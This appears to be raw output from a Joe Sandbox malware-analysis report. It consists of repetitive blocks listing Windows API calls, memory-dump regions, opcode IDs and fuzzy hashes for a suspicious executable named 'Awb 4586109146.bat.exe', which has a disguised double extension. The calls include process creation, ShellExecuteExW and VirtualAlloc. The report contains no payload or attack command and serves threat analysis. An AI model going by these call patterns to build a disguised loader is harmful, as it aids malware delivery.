                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 64ed6ed63553c3debb963e99cdceae8c5f2f4ed38a401ee0c6b4ad6bb8aa7b6c
                                                                    • Instruction ID: 6c8b7a7afc7aeb3e996b6e5dc2b2c32cd2e79b991574bcf3a276c199f91445cd
                                                                    • Opcode Fuzzy Hash: 64ed6ed63553c3debb963e99cdceae8c5f2f4ed38a401ee0c6b4ad6bb8aa7b6c
                                                                    • Instruction Fuzzy Hash: C1D01232B04100D7DB10DBA4AF4899D73A49B84369B344577E102F11D0D6B9D9416A29
                                                                    APIs
                                                                    • SendMessageW.USER32(00010438,00000000,00000000,00000000), ref: 0040428F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                                                    • Instruction ID: 5c868bdd594fc053bdde718b2d54d3bc7308835e7239c12b28f3ea995dd83e98
                                                                    • Opcode Fuzzy Hash: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                                                    • Instruction Fuzzy Hash: 3EC09BB27443007BDE118F909D49F1777545790741F18447D7344F51E0D674D450D61C
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403355
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                    • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                    • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                    • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                    APIs
                                                                    • SendMessageW.USER32(00000028,?,?,00404091), ref: 00404274
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                    • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                                    • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                    • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                                    APIs
                                                                    • ShellExecuteExW.SHELL32(?), ref: 004058F5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: ExecuteShell
                                                                    • String ID:
                                                                    • API String ID: 587946157-0
                                                                    • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                    • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                                    • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                    • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,0040402A), ref: 0040425D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
                                                                    • Instruction ID: 53e6378d439adf7425634a45181eb817498d90fd80a7d40cc762234469e1412e
                                                                    • Opcode Fuzzy Hash: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
                                                                    • Instruction Fuzzy Hash: C5A00275544501DBCE115B50DF058057A61F7E47017514479A5555103486714461EB19
                                                                    APIs
                                                                    • VirtualAlloc.KERNELBASE(00000000), ref: 73962B6B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true
                                                                    • Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 63cdb6f3f1f14af91ae49d6f708e65334542ac3f890bd71e72efbf89a0337b76
                                                                    • Instruction ID: 333a699422284168f91b90f30756662820e8c4b9b146b62700231a6cc4389120
                                                                    • Opcode Fuzzy Hash: 63cdb6f3f1f14af91ae49d6f708e65334542ac3f890bd71e72efbf89a0337b76
                                                                    • Instruction Fuzzy Hash: 38419FB2807609EFEB21EF65DE417D93769EB04358F30442AE48DCE280D639D8849B93
                                                                    APIs
                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                      • Part of subcall function 00405322: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,0040327A,0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0), ref: 0040537D
                                                                      • Part of subcall function 00405322: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll), ref: 0040538F
                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                      • Part of subcall function 004058A3: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                                      • Part of subcall function 004058A3: CloseHandle.KERNEL32(?), ref: 004058D9
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D
                                                                      • Part of subcall function 00406745: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406756
                                                                      • Part of subcall function 00406745: GetExitCodeProcess.KERNEL32(?,?), ref: 00406778
                                                                      • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2972824698-0
                                                                    • Opcode ID: aaec09a509645010865dafd0abc3644c3bfecfb7619cc712dd1918ecd69f6dac
                                                                    • Instruction ID: 9073c6adce58ff193a4fc3832a7f1d33e0b572ffc6e746f3319226a0f770ccba
                                                                    • Opcode Fuzzy Hash: aaec09a509645010865dafd0abc3644c3bfecfb7619cc712dd1918ecd69f6dac
                                                                    • Instruction Fuzzy Hash: 24F0F0329090219BDB20FBA189885DE72A49F44318B2441BBF902B20D1CBBC0E409A6E
                                                                    APIs
                                                                    • GlobalAlloc.KERNELBASE(00000040,?,7396123B,?,739612DF,00000019,739611BE,-000000A0), ref: 73961225
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true
                                                                    • Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: AllocGlobal
                                                                    • String ID:
                                                                    • API String ID: 3761449716-0
                                                                    • Opcode ID: 98c0150f579313bbc7855d86146f1daf38b937717357d7736c3fc37dcc4b65bf
                                                                    • Instruction ID: 473050941e88255bdb719725b368d5bfa81f67fe9eae8cea4ed04b31c6f01d2d
                                                                    • Opcode Fuzzy Hash: 98c0150f579313bbc7855d86146f1daf38b937717357d7736c3fc37dcc4b65bf
                                                                    • Instruction Fuzzy Hash: E6B012B2A09410EFEF00ABA5CD06F353254E700301F144024F60CCC180C120C8008534
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                                                    • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                                                    • DeleteObject.GDI32(00000000), ref: 00404D94
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                                                    • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                                                    • GlobalFree.KERNEL32(?), ref: 004050CE
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                                                    • InvalidateRect.USER32(?,00000000,?), ref: 0040521F
                                                                    • ShowWindow.USER32(?,00000000), ref: 0040526D
                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                                                    • ShowWindow.USER32(00000000), ref: 0040527F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $M$N
                                                                    • API String ID: 1638840714-813528018
                                                                    • Opcode ID: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                    • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
                                                                    • Opcode Fuzzy Hash: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                    • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                                                    • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404889
                                                                    • lstrcatW.KERNEL32(?,Call), ref: 00404895
                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                                      • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917
                                                                      • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                      • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                      • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                      • Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                    • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,?,0042B218,?,?,000003FB,?), ref: 0040496A
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                                      • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                      • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                                      • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
